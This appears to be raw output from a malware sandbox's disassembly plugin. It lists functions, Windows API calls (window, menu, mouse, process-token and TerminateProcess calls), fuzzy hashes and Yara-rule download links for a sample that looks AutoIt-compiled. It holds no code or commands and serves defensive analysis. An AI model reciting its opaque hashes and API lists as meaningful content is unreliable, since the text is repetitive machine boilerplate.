Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 19fcbade3c47305ab2dad0fe9c93665ee456a828ab43ff7a035a94659b5a48e0
Instruction ID: d0bdb36d7171f6aeeeacc14067d4fdd4cc35c9ac65acd6c31580bc451cdb5eeb
Opcode Fuzzy Hash: 19fcbade3c47305ab2dad0fe9c93665ee456a828ab43ff7a035a94659b5a48e0
Instruction Fuzzy Hash: E3514E31E00625EFCF11EF64C8599AEBBB6FF48311F14405AED52AB351CB34AE458B90

Function 0062EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0062EF06
VariantClear.OLEAUT32(00000013), ref: 0062EF78
VariantClear.OLEAUT32(00000000), ref: 0062EFD3
_memmove.LIBCMT ref: 0062EFFD
VariantClear.OLEAUT32(?), ref: 0062F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0062F078

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: e21115dc194fffc55d98d385de41930edf4868ee2075393ef6dee27bcb07458b
Instruction ID: ea6601380306b1d84b69245b3bb1492a1a39c48d8efdc603e0b9b2ebec2aa133
Opcode Fuzzy Hash: e21115dc194fffc55d98d385de41930edf4868ee2075393ef6dee27bcb07458b
Instruction Fuzzy Hash: 3F5166B5A00219EFCB10DF58D894AAAB7F9FF4C310B15856AE949DB301E335E911CFA0

Function 0063220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00632258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006322A3
IsMenu.USER32(00000000), ref: 006322C3
CreatePopupMenu.USER32 ref: 006322F7
GetMenuItemCount.USER32(000000FF), ref: 00632355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00632386

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ff5c76671f03366eb457c9a777865d4d8769416811cee9ed403208af5564ef3b
Instruction ID: 5574d8bc3aa6b84c346968de8d46f5d1e77f11056c4814f0d3181e06c46d4711
Opcode Fuzzy Hash: ff5c76671f03366eb457c9a777865d4d8769416811cee9ed403208af5564ef3b
Instruction Fuzzy Hash: C451AD7060130BDBEF21CF68D8A8BEEBBF6BF45314F104129E851A7290D7759A45CB91

Function 005D1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 005D179A
GetWindowRect.USER32(?,?), ref: 005D17FE
ScreenToClient.USER32(?,?), ref: 005D181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005D182C
EndPaint.USER32(?,?), ref: 005D1876

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 478befe94945db7d1b62c6fd87ef22655a408ec183662848fc80127e0e1e9b63
Instruction ID: 8d8b0deb7a5d874d1eb22336a5e491d292d71a94e59c3896e9bcaff51581ee3d
Opcode Fuzzy Hash: 478befe94945db7d1b62c6fd87ef22655a408ec183662848fc80127e0e1e9b63
Instruction Fuzzy Hash: 1E41A130504B01AFD721DF29CC84FBA7BEAFB45724F04462AF9A58B2B1C7319845DB65

Function 0065B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006957B0,00000000,00EB5B50,?,?,006957B0,?,0065B5A8,?,?), ref: 0065B712
EnableWindow.USER32(00000000,00000000), ref: 0065B736
ShowWindow.USER32(006957B0,00000000,00EB5B50,?,?,006957B0,?,0065B5A8,?,?), ref: 0065B796
ShowWindow.USER32(00000000,00000004,?,0065B5A8,?,?), ref: 0065B7A8
EnableWindow.USER32(00000000,00000001), ref: 0065B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0065B7EF

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4753e202998caa9a632379154a8fd6fe6b4c7b72204e4dbc3a22fce5ee3e192b
Instruction ID: 0d876f4236adfd08c0859693ec33af48cb4ac0335159972b44716705f38f0e02
Opcode Fuzzy Hash: 4753e202998caa9a632379154a8fd6fe6b4c7b72204e4dbc3a22fce5ee3e192b
Instruction Fuzzy Hash: B7416D34600244AFDB26CF24D499BD57BE2FF49312F1851B9ED488F7A2C731A85ACB51

Function 0064709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00644E41,?,?,00000000,00000001), ref: 006470AC

Part of subcall function 006439A0: GetWindowRect.USER32(?,?), ref: 006439B3

GetDesktopWindow.USER32 ref: 006470D6
GetWindowRect.USER32(00000000), ref: 006470DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0064710F

Part of subcall function 00635244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006352BC

GetCursorPos.USER32(?), ref: 0064713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00647199

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: acada5752eb2893dce05ff1546e3a0830a6a7c06879a0a1a7c5c8b36851a4d5a
Instruction ID: 00bfcb6d28ed9744c706d209893e5d7910bc15ced4ab2877602fa12cabfcd239
Opcode Fuzzy Hash: acada5752eb2893dce05ff1546e3a0830a6a7c06879a0a1a7c5c8b36851a4d5a
Instruction Fuzzy Hash: C231D072509305ABD720DF14C849F9BB7AAFF88314F040929F585A7291DB30EA09CBD2

Function 00628879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006280C0
Part of subcall function 006280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006280CA
Part of subcall function 006280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006280D9
Part of subcall function 006280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006280E0
Part of subcall function 006280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006280F6

GetLengthSid.ADVAPI32(?,00000000,0062842F), ref: 006288CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006288D6
HeapAlloc.KERNEL32(00000000), ref: 006288DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 006288F6
GetProcessHeap.KERNEL32(00000000,00000000,0062842F), ref: 0062890A
HeapFree.KERNEL32(00000000), ref: 00628911

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b46491e158bd417d31e4e2204f098712fca41536768daa25472ab2ead4b2ef3d
Instruction ID: 167abb0de865da123737da19ea406c1484e8d9cdc74ceb63aa321f212bcb9f4d
Opcode Fuzzy Hash: b46491e158bd417d31e4e2204f098712fca41536768daa25472ab2ead4b2ef3d
Instruction Fuzzy Hash: BC11AF31902A19FFDB10DFA8EC09BBE776AEB44312F148028E88597210CB369940DB60

Function 006285B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006285E2
OpenProcessToken.ADVAPI32(00000000), ref: 006285E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006285F8
CloseHandle.KERNEL32(00000004), ref: 00628603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00628632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00628646

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: dbc8324ff99f41046574e9c252bfd449262dc752388f68a78f370456bb2c3a6b
Instruction ID: fe0ab2e9405154a8c97d8508b04e12c977e6ffb8494b503e873d03b1e1b0a376
Opcode Fuzzy Hash: dbc8324ff99f41046574e9c252bfd449262dc752388f68a78f370456bb2c3a6b
Instruction Fuzzy Hash: 3F115C72501209AFDF01CFA4ED49FDE7BAAEF48305F044064FE04A21A0C7719D61DB60

Function 0062B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0062B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0062B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0062B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0062B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0062B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0062B7FE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b82301d6edc8c98dc2eb6df9e8f17d5fb810d8cad9084e050388cc22cfbc370b
Instruction ID: 6680990edd91092581652497b3134d874993e22fc7107358808a6654ce6039e1
Opcode Fuzzy Hash: b82301d6edc8c98dc2eb6df9e8f17d5fb810d8cad9084e050388cc22cfbc370b
Instruction Fuzzy Hash: 7F018475E00719BBEB109BA69C45A5EBFB9EB48311F004075FA04A7291D6319C00CF91

Function 005F0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 005F0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 005F019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 005F01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 005F01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 005F01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 005F01C1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 4aa91507fc7188febc7f1b433ecb7a1fbc3a9c02a3ca981ac66f3a795c050e1c
Instruction ID: 13a919851c261f0c8dc30dfbccb15a12ce00a2de6e716c745d19274979e8e478
Opcode Fuzzy Hash: 4aa91507fc7188febc7f1b433ecb7a1fbc3a9c02a3ca981ac66f3a795c050e1c
Instruction Fuzzy Hash: 44016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C47941C7F5A864CBE5

Function 006353E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006353F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0063540F
GetWindowThreadProcessId.USER32(?,?), ref: 0063541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00635437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0063543E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 611bc4b2fd4dce84ac4786feeb9073602bd3499467d07a408be8edc1d8c76f9b
Instruction ID: 2217453b1e087ffb13d9d979828bf8ac1ed35db6d05917d3868a3393445fb95a
Opcode Fuzzy Hash: 611bc4b2fd4dce84ac4786feeb9073602bd3499467d07a408be8edc1d8c76f9b
Instruction Fuzzy Hash: 91F03032241658BBE7319BA2DC0DEEF7F7DEFC6B12F000169FA05D2061DBA11A0186B5

Function 00637230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00637243
EnterCriticalSection.KERNEL32(?,?,005E0EE4,?,?), ref: 00637254
TerminateThread.KERNEL32(00000000,000001F6,?,005E0EE4,?,?), ref: 00637261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,005E0EE4,?,?), ref: 0063726E

Part of subcall function 00636C35: CloseHandle.KERNEL32(00000000,?,0063727B,?,005E0EE4,?,?), ref: 00636C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00637281
LeaveCriticalSection.KERNEL32(?,?,005E0EE4,?,?), ref: 00637288

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e872298c1256be68cbe94da2095c749a172cceb6ec25f7afed5ba4e32bf71eda
Instruction ID: 31fa8b49cac6a1fd2c7d383079f576eab42b93a430a3fdf01c90954e6a3f2d34
Opcode Fuzzy Hash: e872298c1256be68cbe94da2095c749a172cceb6ec25f7afed5ba4e32bf71eda
Instruction Fuzzy Hash: 18F05EB6541712EBDB626BA4ED4C9DB772BEF45703F102531F503914A0CB765A01CB90

Function 00628992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0062899D
UnloadUserProfile.USERENV(?,?), ref: 006289A9
CloseHandle.KERNEL32(?), ref: 006289B2
CloseHandle.KERNEL32(?), ref: 006289BA
GetProcessHeap.KERNEL32(00000000,?), ref: 006289C3
HeapFree.KERNEL32(00000000), ref: 006289CA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f353c11441873332335cd5b0b87fd21e109657912051a06852306ab2b18fcdc3
Instruction ID: 245acd833f2fcf362e210e1fd4b5a7c8cbf28d163e222b7d13d354794149f87d
Opcode Fuzzy Hash: f353c11441873332335cd5b0b87fd21e109657912051a06852306ab2b18fcdc3
Instruction Fuzzy Hash: BAE0C236004601FBDB01AFE1EC0C90ABB6AFB89323B109230F21981470CB32A420DB90

Function 00627530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00662C7C,?), ref: 006276EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00662C7C,?), ref: 00627702
CLSIDFromProgID.OLE32(?,?,00000000,0065FB80,000000FF,?,00000000,00000800,00000000,?,00662C7C,?), ref: 00627727
_memcmp.LIBCMT ref: 00627748

Strings

,,f, xrefs: 0062753D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,f
API String ID: 314563124-1408682325
Opcode ID: 9f5412b97bd2d7de81bfc540f7890adcbfc9f32e365c652b0354602f51bb57b6
Instruction ID: a9f9bb76108b8c20923f2da2469c538bd8620f3760975e7abb5d312499f7210b
Opcode Fuzzy Hash: 9f5412b97bd2d7de81bfc540f7890adcbfc9f32e365c652b0354602f51bb57b6
Instruction Fuzzy Hash: F4812C71A0051AEFCB04DFA4D984DEEB7BAFF89315F204159E505AB250DB71AE06CF60

Function 006485ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00648613
CharUpperBuffW.USER32(?,?), ref: 00648722
VariantClear.OLEAUT32(?), ref: 0064889A

Part of subcall function 00637562: VariantInit.OLEAUT32(00000000), ref: 006375A2
Part of subcall function 00637562: VariantCopy.OLEAUT32(00000000,?), ref: 006375AB
Part of subcall function 00637562: VariantClear.OLEAUT32(00000000), ref: 006375B7

Strings

AUTOIT.ERROR, xrefs: 00648728
Incorrect Parameter format, xrefs: 0064864B, 0064880D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 65f05b643f341eff4f731fa244798f82ac8f494be8c989b51ecc81efe1c83d18
Instruction ID: c114b9108c3a6a354486a43b410d88b106b33db65aa61e3f8a762484db659826
Opcode Fuzzy Hash: 65f05b643f341eff4f731fa244798f82ac8f494be8c989b51ecc81efe1c83d18
Instruction Fuzzy Hash: 17914C716043019FC750EF28C48495EBBE6FF89714F14496EF89A8B361DB31E946CB91

Function 00632A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005EFC86: _wcscpy.LIBCMT ref: 005EFCA9

_memset.LIBCMT ref: 00632B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00632BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00632C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00632C97

Strings

0, xrefs: 00632B73

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 2c3808ce005f0549715b762513ef511b55ad2e7987d7f9f46e99a9890bb2147e
Instruction ID: fb54c1cebd91501008aaf1e739db42ff8d5d420871d0c1e88e31dd0ee87284ba
Opcode Fuzzy Hash: 2c3808ce005f0549715b762513ef511b55ad2e7987d7f9f46e99a9890bb2147e
Instruction Fuzzy Hash: BD51DF715083029BD7659F28D869AAFBBEAEF84310F141A2EF881D32D1DB70CD0587D2

Function 005E3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E3277
_memmove.LIBCMT ref: 005E3310
_free.LIBCMT ref: 005E3336
_memmove.LIBCMT ref: 005E33E9

Strings

3c^, xrefs: 005E3225
_^, xrefs: 005E3322

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
